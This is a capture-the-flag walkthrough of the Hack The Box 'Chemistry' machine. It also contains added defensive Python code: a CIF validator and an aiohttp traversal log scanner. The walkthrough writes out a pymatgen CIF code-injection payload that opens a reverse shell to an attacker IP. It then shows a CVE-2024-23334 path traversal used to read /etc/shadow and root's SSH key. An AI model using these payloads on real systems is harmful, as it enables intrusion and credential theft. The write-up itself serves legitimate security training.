# HTB | Chemistry

This is a Linux box. You can find it [here](https://app.hackthebox.com/machines/Chemistry).

**Skills Learned**

* CIF exploit
* CVE-2024-23334

## NMAP

IP: 10.129.30.124

```
nmap -sT -p- --min-rate 10000 10.129.30.124
```

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2Ffd4VGOPSrTTRYoYX8RC8%2Fimage.png?alt=media&#x26;token=4187284b-b390-4a8b-a824-8fd1651c6a53" alt=""><figcaption><p>nmap</p></figcaption></figure>

### Port 5000

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FA3VWMz30mIlvV1kGmQMR%2Fimage.png?alt=media&#x26;token=9535d169-38d6-45ea-a74a-e1396e9cb4df" alt=""><figcaption><p>port 5000</p></figcaption></figure>

After registering, we get a file upload option that accepts `.cif` files.

We can download an `example.cif` to look at the syntax.

## Foothold/shell

### CIF Exploit

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FfobOht57s6OPmjlziX80%2Fimage.png?alt=media&#x26;token=7ed80433-a795-4308-88c0-398d301670d4" alt=""><figcaption><p>example.cif</p></figcaption></figure>

It is a CIF (Crystallographic Information File) format, which is commonly used in crystallography to describe the atomic structure of crystals. Here’s a breakdown of the data:

1. **Cell Parameters**:

   These describe the dimensions of the unit cell (the repeating structure in the crystal lattice):

   * **\_cell\_length\_a**: The length of the unit cell along the "a" axis (10.00000 Å).
   * **\_cell\_length\_b**: The length of the unit cell along the "b" axis (10.00000 Å).
   * **\_cell\_length\_c**: The length of the unit cell along the "c" axis (10.00000 Å).
   * **\_cell\_angle\_alpha**: The angle between the "b" and "c" axes (90.00000 degrees).
   * **\_cell\_angle\_beta**: The angle between the "a" and "c" axes (90.00000 degrees).
   * **\_cell\_angle\_gamma**: The angle between the "a" and "b" axes (90.00000 degrees).

   These parameters indicate that the unit cell is cubic (since all angles are 90 degrees and the lengths are equal).
2. **Symmetry Information**:
   * **\_symmetry\_space\_group\_name\_H-M 'P 1'**: This specifies the space group of the crystal. 'P 1' indicates the simplest space group, with no symmetry beyond translational symmetry. It is the most basic space group in crystallography, implying there are no additional symmetry operations like rotations or reflections.
3. **Atomic Positions**:\
   The loop section defines the positions of atoms within the unit cell. The fractional coordinates (\_fract\_x, \_fract\_y, \_fract\_z) specify the position of each atom relative to the dimensions of the unit cell:
   * **H (Hydrogen)**:
     * Coordinates: (0.00000, 0.00000, 0.00000) — at the origin of the unit cell.
     * Occupancy: 1 (fully occupied).
   * **O (Oxygen)**:
     * Coordinates: (0.50000, 0.50000, 0.50000) — at the centre of the unit cell.
     * Occupancy: 1 (fully occupied).

<mark style="color:blue;">**Overall Explanation**</mark>: This CIF file describes a crystal with a simple cubic unit cell, where a hydrogen atom is located at the origin and an oxygen atom is located at the centre of the unit cell. The space group "P 1" implies no symmetry beyond basic translation, meaning there are no mirror planes, rotations, or inversions in the crystal structure.

#### Payload

Searching for the payload led me to [this](https://github.com/materialsproject/pymatgen/security/advisories/GHSA-vgv8-5cpj-qj2f) GitHub security advisory (GHSA-vgv8-5cpj-qj2f). After some trial and error, I found the reverse shell payload.

Edit `example.cif` and add the lines below:

```
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c 'sh -i >& /dev/tcp/10.10.14.46/1234 0>&1'");0,0,0'


_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
```

The payload above is not standard crystallographic data; it is Python code hidden in a CIF data field, which the server's CIF parser ends up evaluating, and it is used here for shell command injection. Here's what's happening in this command:

**Breakdown**:

* **\_space\_group\_magn.transform\_BNS\_Pp\_abc**: This CIF tag normally holds a crystallographic transformation string (of the form `a,b,c;0,0,0`); here it is abused to carry Python code inside the data field.
* **The Code**:
  * The code uses Python introspection (`().__class__.__mro__[1]` is `object`) to walk `object.__subclasses__()` and find the `BuiltinImporter` class, then uses it to load the `os` module.
  * It then calls `os.system` to run a shell command that opens a reverse shell to IP 10.10.14.46 on port 1234. The command `sh -i >& /dev/tcp/10.10.14.46/1234 0>&1` redirects an interactive shell's input and output over a TCP connection to that IP and port.
* **Reverse Shell**: If the parser evaluates this field, the machine processing the CIF file connects back to the attacker's listener at 10.10.14.46 on port 1234, giving the attacker remote control of the server running the CIF parser.
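The `example.cif` breakdown and the payload analysis above both come down to one parser decision: what the server accepts inside a CIF data field. As an added example that is not code from the writeup or from pymatgen, the following reads the tags and atom loop of a CIF like `example.cif` and checks the `_space_group_magn.transform_BNS_Pp_abc` value against the grammar a real transformation string follows, so Python code in that field is rejected before anything could evaluate it. The sample CIF text, the tampered variant and all function names are constructed for this example.

```python
"""Added example, not code from the writeup or from pymatgen: a small reader for the
CIF tags example.cif uses, plus a strict parser for the magnetic space-group transform
string that the linked advisory says pymatgen evaluated. A fixed grammar rejects
anything that is not an 'x,y,z;tx,ty,tz' transformation."""
import re
from fractions import Fraction

# Constructed to match the example.cif described above (cubic P 1 cell, H at the
# origin, O at the body centre). Not the file from the box.
EXAMPLE_CIF = """\
data_example
_cell_length_a 10.00000
_cell_length_b 10.00000
_cell_length_c 10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta 90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
_atom_site_label
_atom_site_fract_x
_atom_site_fract_y
_atom_site_fract_z
_atom_site_occupancy
H 0.00000 0.00000 0.00000 1
O 0.50000 0.50000 0.50000 1
"""
TRANSFORM_TAG = "_space_group_magn.transform_BNS_Pp_abc"
# Constructed stand-in with the shape of the payload above (Python attribute syntax
# where an axis expression belongs); it is not the payload itself.
TAMPERED_CIF = EXAMPLE_CIF + TRANSFORM_TAG + " 'a,b,().__class__;0,0,0'\n"
CELL_KEYS = [f"_cell_length_{k}" for k in "abc"] + [f"_cell_angle_{k}" for k in ("alpha", "beta", "gamma")]
_QUOTED = re.compile(r"""^(?:'(.*?)'|"(.*?)")(?=\s|$)""")  # a quote closes a value only before whitespace
_TERM = re.compile(r"^[+-]?(?:\d+(?:/\d+)?)?[abc]$")       # e.g. a, -b, 2c, 1/2a
_NUM = re.compile(r"^[+-]?\d+(?:/\d+)?$")                  # e.g. 0, 1/2, -1

def _value(raw):
    # Unquote a CIF value using the whitespace-delimited quoting rule.
    m = _QUOTED.match(raw)
    return (m.group(1) if m.group(1) is not None else m.group(2)) if m else raw.split()[0]

def parse_cif(text):
    """Return (tags, loops): tags maps '_name' -> str, loops is a list of
    (column_names, rows). Single-line values only, which is all we need."""
    tags, loops, i = {}, [], 0
    lines = [ln.strip() for ln in text.splitlines() if ln.strip() and not ln.lstrip().startswith("#")]
    while i < len(lines):
        if lines[i] == "loop_":
            cols, rows = [], []
            i += 1
            while i < len(lines) and lines[i].startswith("_"):
                cols.append(lines[i])
                i += 1
            while i < len(lines) and not lines[i].startswith(("_", "loop_", "data_")):
                rows.append(lines[i].split())
                i += 1
            loops.append((cols, rows))
            continue
        if lines[i].startswith("_"):
            parts = lines[i].split(None, 1)
            tags[parts[0]] = _value(parts[1]) if len(parts) > 1 else ""
        i += 1  # also skips data_ headers, which we do not need
    return tags, loops

def parse_transform(s):
    """Strict reader for Jones-faithful strings such as '-b,a,c;1/2,0,0'. Returns (P, p):
    P a 3x3 list of Fractions, p the translation. Anything else raises ValueError."""
    parts = s.replace(" ", "").split(";")
    if len(parts) != 2:
        raise ValueError("expected 'x,y,z;tx,ty,tz'")
    exprs, trans = parts[0].split(","), parts[1].split(",")
    if len(exprs) != 3 or len(trans) != 3 or not all(_NUM.match(t) for t in trans):
        raise ValueError("expected three axis expressions and three numeric translations")
    P = []
    for expr in exprs:
        terms = re.findall(r"[+-]?[^+-]+", expr)
        if not terms or "".join(terms) != expr:
            raise ValueError(f"malformed axis expression {expr!r}")
        row = [Fraction(0)] * 3
        for term in terms:
            if not _TERM.match(term):
                raise ValueError(f"illegal term {term!r}")
            coeff = term[:-1]  # 'a' -> 1, '-b' -> -1, '1/2a' -> 1/2
            row["abc".index(term[-1])] += Fraction(coeff + "1" if coeff in ("", "+", "-") else coeff)
        P.append(row)
    return P, [Fraction(t) for t in trans]

def scan_cif(text):
    """Validate an uploaded CIF before a crystallography library sees it: cell parameters
    must be numeric and the transform tag, if present, must parse. Empty list = passed."""
    tags, _loops = parse_cif(text)
    problems = []
    for key in CELL_KEYS:
        try:
            float(tags[key])
        except (KeyError, ValueError):
            problems.append(f"{key}: missing or not numeric")
    if TRANSFORM_TAG in tags:
        try:
            parse_transform(tags[TRANSFORM_TAG])
        except ValueError as exc:
            problems.append(f"{TRANSFORM_TAG}: {exc}")
    return problems
```

`scan_cif` is the kind of check an upload handler can run before handing the file to pymatgen; the durable fix is a patched pymatgen release, as the advisory describes, rather than an input filter alone.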

Start the nc listener first, then upload the file and click View.

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FEBdr1Ssim2jnfCV4cU70%2Fimage.png?alt=media&#x26;token=1a36e045-ed6c-41e5-b1e8-f2cb82284a59" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FD3k8c5zvGmg3cRsD05G4%2Fimage.png?alt=media&#x26;token=36ebf8bb-4bde-4dc0-81ce-a57a1797ffaa" alt=""><figcaption><p>nc -nlvp 1234</p></figcaption></figure>

We find `user.txt`, but we do not have permission to read it.

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FaJhRMpvEHrE3zzFscm9Q%2Fimage.png?alt=media&#x26;token=4435583c-ac56-43d2-979b-12f87dc8044a" alt=""><figcaption></figcaption></figure>

Looking around the server, we find a `database.db` file.

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FRYKMxvzUfhbVbj8O9j3R%2Fimage.png?alt=media&#x26;token=f94f89de-6ce1-4c81-bddd-fe1316c36a3d" alt=""><figcaption><p>database.db</p></figcaption></figure>

Inspecting `database.db` further, we find password hashes for the users.

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FhK7VvyeiQEgOsVyePZ6p%2Fimage.png?alt=media&#x26;token=01e05740-705a-4efc-98ba-58491ebb20ad" alt=""><figcaption><p>passwords</p></figcaption></figure>

Cracking Rosa's hash with [crackstation](https://crackstation.net/) gives her password.

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FF9HOzXVljGem2kP5iMa4%2Fimage.png?alt=media&#x26;token=45278d40-8498-4073-b45a-93e8d303ed7c" alt=""><figcaption><p>crackstation</p></figcaption></figure>

Now we can view **user.txt**.

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FFENVEpWW3j63D18HbgsM%2Fimage.png?alt=media&#x26;token=992ccde1-9953-47f5-a66a-1c8ff69bba53" alt=""><figcaption><p>user.txt</p></figcaption></figure>

## Priv Esc

For further enumeration, we will copy linpeas to the box.

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2F124PEvs3kZizLwT2F7AM%2Fimage.png?alt=media&#x26;token=239cff96-1a92-427c-9b84-60e0da91dc9e" alt=""><figcaption></figcaption></figure>

Now we run it.

linpeas shows an internal service listening on port 8080.

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2F6gqTxWgC6EexpbfAV2uj%2Fimage.png?alt=media&#x26;token=cb2df07c-e839-46fb-bcda-949bf3addead" alt=""><figcaption><p>8080</p></figcaption></figure>

Forward the box's port 8080 to our local port 8888 so we can reach it via localhost:

```
ssh -L 8888:localhost:8080 rosa@10.129.30.146
```

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FR2oYJmm17a5vKaYdSftS%2Fimage.png?alt=media&#x26;token=6aa751b6-3312-4d6f-8644-1b4b713d97dd" alt=""><figcaption><p>port forward</p></figcaption></figure>

Running nmap against localhost:8888 shows that **aiohttp 3.9.1** is serving the internal port 8080.

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2Fvgi32jAwjcZEoViRZjmz%2Fimage.png?alt=media&#x26;token=592e3a91-e88a-4d74-aa1c-c954d443fa87" alt=""><figcaption><p>nmap</p></figcaption></figure>

### CVE-2024-23334

Searching for an **aiohttp 3.9.1** exploit turns up [this](https://github.com/z3rObyte/CVE-2024-23334-PoC) GitHub repo with a PoC.

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FrMvWXlGcMivyYr4Ul6ZH%2Fimage.png?alt=media&#x26;token=c8015a28-1e7d-47b2-b0ad-c1629b815828" alt=""><figcaption><p>exploit.sh</p></figcaption></figure>

Let's copy this exploit to the box and run it.

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FD7hAGvg7gCZi47VUQFoy%2Fimage.png?alt=media&#x26;token=022878d8-c644-422f-9c92-9e3c33336b52" alt=""><figcaption></figcaption></figure>

Looks like we have to modify the script.

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FtF9u1S7hYlg7tx4DlMrA%2Fimage.png?alt=media&#x26;token=f8960a13-0289-43d4-9f63-8ee05e5c3e78" alt=""><figcaption></figcaption></figure>

After making the necessary changes to the script, running it returns `/etc/passwd`.

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FAxk6mpjvMTCuruDbdqcg%2Fimage.png?alt=media&#x26;token=d1b7646d-b67a-4f30-ab6f-b399828c555d" alt=""><figcaption><p>/etc/passwd</p></figcaption></figure>

To confirm that the service reads files with root permissions, replace `etc/passwd` with `etc/shadow` in the script and run it again; if `/etc/shadow` comes back, we can read any file on the box.

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FWIQJx3RL60JvmJYCLmCh%2Fimage.png?alt=media&#x26;token=cb8d63cf-ebb9-4aa0-a856-f0af74fbe56c" alt=""><figcaption><p>/etc/shadow</p></figcaption></figure>

Now that we know the exploit works, we can get `root.txt`.

There are two ways to do this.
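The PoC works because aiohttp 3.9.1 served the static route with `follow_symlinks=True` and never checked that the resolved file stayed under the static root; releases from 3.9.2 onward apply that check. As an added example that is not code from the writeup, the PoC repo or aiohttp, the following implements the containment check in plain Python and runs it over a few constructed access-log lines (in aiohttp's default log format) to flag traversal requests, so a defender can spot reads like the `/etc/passwd` and `/etc/shadow` ones this walkthrough performs. The static root `/srv/app/static`, the `/static` prefix and the log lines are assumptions.

```python
"""Added example, not code from the writeup, the PoC repo or aiohttp: the containment
check a static-file handler must make for every request, and the same check run over
access-log lines to flag traversal attempts."""
import os
import re
from urllib.parse import unquote

STATIC_ROOT = "/srv/app/static"   # assumed layout, not the box's real path
URL_PREFIX = "/static"            # assumed route prefix

def resolve_static(root, prefix, url_path):
    """Return the file under root that url_path maps to, or None when the request
    would leave root. Percent-decodes first, then resolves '..' and symlinks, so
    encoded, lexical and symlink escapes all fail the same comparison."""
    prefix = prefix.rstrip("/") + "/"
    if not url_path.startswith(prefix):
        return None
    rel = unquote(url_path[len(prefix):].split("?", 1)[0])
    if rel.startswith("/") or "\x00" in rel:
        return None
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, rel))
    if os.path.commonpath([root_real, candidate]) != root_real:
        return None
    return candidate

# aiohttp's default access-log format: %a %t "%r" %s %b "%{Referer}i" "%{User-Agent}i"
_LOG_RE = re.compile(r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Constructed lines, not from the box: one normal request and two traversal attempts,
# the second percent-encoded. 127.0.0.1 because the service was reached via the port forward.
SAMPLE_LOG = [
    '127.0.0.1 [10/Nov/2024:12:00:01 +0000] "GET /static/css/site.css HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '127.0.0.1 [10/Nov/2024:12:00:07 +0000] "GET /static/../../../etc/passwd HTTP/1.1" 200 1830 "-" "curl/8.4.0"',
    '127.0.0.1 [10/Nov/2024:12:00:09 +0000] "GET /static/%2e%2e/%2e%2e/%2e%2e/etc/shadow HTTP/1.1" 200 1060 "-" "curl/8.4.0"',
]

def traversal_attempts(lines, root=STATIC_ROOT, prefix=URL_PREFIX):
    """Return (ip, raw_path, status) for every static request the containment check
    rejects. A 200 on such a line means the server actually served the file."""
    hits = []
    for line in lines:
        m = _LOG_RE.match(line)
        if m and m["path"].startswith(prefix) and resolve_static(root, prefix, m["path"]) is None:
            hits.append((m["ip"], m["path"], int(m["status"])))
    return hits
```

On the server side the fix is the one the advisory gives: upgrade aiohttp to 3.9.2 or later and leave `follow_symlinks` at its default of `False` in `web.static()` unless the directory genuinely needs it; the log scan above is how a defender finds out whether the hole was already used.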

#### Method 1

We can read **root.txt** directly. For this, change `/etc/shadow` to `root/root.txt` and run the script.

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FAe35ds7Hj35QEspNRyv0%2Fimage.png?alt=media&#x26;token=4b622bc2-8424-4396-9e9d-e7a7360b31cd" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FzulA4rA8EtKL2iPtlUPl%2Fimage.png?alt=media&#x26;token=efc21dc4-8992-4d31-b347-3ec8d93c7931" alt=""><figcaption><p>root.txt</p></figcaption></figure>

#### Method 2

We can also read root's `id_rsa` and SSH in as root.

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FI4H2pRqBxp4K1AKnJGpU%2Fimage.png?alt=media&#x26;token=4c06b139-b097-4de2-b793-87b54538781e" alt=""><figcaption></figcaption></figure>

Running it returns root's private RSA key.

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FcE3Zo0f2JYHYf6wixgpN%2Fimage.png?alt=media&#x26;token=3b649707-e7c8-45eb-b351-abc67cb14d94" alt=""><figcaption></figcaption></figure>

Copy the key and SSH in as root.

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2F6TdtaGSG5WsJy1M0gXJs%2Fimage.png?alt=media&#x26;token=74f33ba2-1345-46ff-9283-71117ac90bc7" alt=""><figcaption><p>ssh as root</p></figcaption></figure>

Now we can grab **root.txt**.

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2F0CpjzodQ3jthz2Oqxkq8%2Fimage.png?alt=media&#x26;token=17d884d3-0fed-4f09-b190-3751d6e98a75" alt=""><figcaption><p>root.txt</p></figcaption></figure>
